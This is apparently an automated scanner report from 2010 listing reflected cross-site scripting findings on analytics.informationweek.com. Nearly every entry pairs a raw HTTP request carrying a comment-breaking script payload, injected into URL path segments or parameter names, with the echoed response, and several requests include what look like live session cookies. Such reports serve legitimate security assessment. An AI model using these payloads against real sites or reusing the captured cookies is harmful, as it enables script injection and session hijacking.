GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... d2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6d9f708ac4a%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html?4c7d2--><script>alert(1)</script>6d9f708ac4a=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 52fde--><script>alert(1)</script>8290483de10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Ealert%281%29%3C%2Fscript%3E8290483de10%2F7%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract52fde--><script>alert(1)</script>8290483de10/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 42973--><script>alert(1)</script>454e510e36f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:56 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%3Ealert%281%29%3C%2Fscript%3E454e510e36f%2F4814%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/742973--><script>alert(1)</script>454e510e36f/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 4e97f--><script>alert(1)</script>fee00e08e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:02 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:02 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ript%3Ealert%281%29%3C%2Fscript%3Efee00e08e9%2FEnterprise-Software%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/48144e97f--><script>alert(1)</script>fee00e08e9/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload e65d9--><script>alert(1)</script>d674e82b6c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:09 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:09 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3Ed674e82b6c1%2Fit-pro-impact-report-sharepoint-2010.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Softwaree65d9--><script>alert(1)</script>d674e82b6c1/it-pro-impact-report-sharepoint-2010.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 21610--><script>alert(1)</script>20b72df1c4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:14 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:14 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45993
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E20b72df1c4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html21610--><script>alert(1)</script>20b72df1c4"> ...[SNIP]...
3.20. http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 39828--><script>alert(1)</script>2323f7bbb5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... pt%3Ealert%281%29%3C%2Fscript%3E2323f7bbb5b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/7/4814/Enterprise-Software/it-pro-impact-report-sharepoint-2010.html?39828--><script>alert(1)</script>2323f7bbb5b=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 924e1--><script>alert(1)</script>07bb1c645bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:26 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:26 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... bb1c645bd%2F81%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract924e1--><script>alert(1)</script>07bb1c645bd/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 354b7--><script>alert(1)</script>403b10a048c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:56 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:56 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 403b10a048c%2F4794%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81354b7--><script>alert(1)</script>403b10a048c/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e8b04--><script>alert(1)</script>6a5a5123e13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:03 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:03 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E6a5a5123e13%2FBusiness-Intelligence-and-Information-Management%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794e8b04--><script>alert(1)</script>6a5a5123e13/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 7446c--><script>alert(1)</script>3b3d6a8badb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:10 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:10 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%3E3b3d6a8badb%2Fthree-guidelines-for-implementing-mdm.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management7446c--><script>alert(1)</script>3b3d6a8badb/three-guidelines-for-implementing-mdm.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 240a5--><script>alert(1)</script>fd524b9da39 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:16 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 46057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ipt%3Efd524b9da39&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html240a5--><script>alert(1)</script>fd524b9da39"> ...[SNIP]...
3.26. http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ee31f--><script>alert(1)</script>cb09c6d79c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Ecb09c6d79c0%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/81/4794/Business-Intelligence-and-Information-Management/three-guidelines-for-implementing-mdm.html?ee31f--><script>alert(1)</script>cb09c6d79c0=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 338e7--><script>alert(1)</script>e2d83de194 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... p%3A%2F%2Fanalytics.informationweek.com%2Fcss338e7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee2d83de194%2FprettyPhoto.css&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/css338e7--><script>alert(1)</script>e2d83de194/prettyPhoto.css"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 6cd90--><script>alert(1)</script>e12e4455fca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /css/prettyPhoto.css6cd90--><script>alert(1)</script>e12e4455fca HTTP/1.1 Host: analytics.informationweek.com Proxy-Connection: keep-alive Referer: http://analytics.informationweek.com/index73f79--%3E%3Cscript%3Ealert(1)%3C/script%3E30362e0897/caslogin Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; s_lv=1292112029666; __qca=P0-1196101997-1292112032216
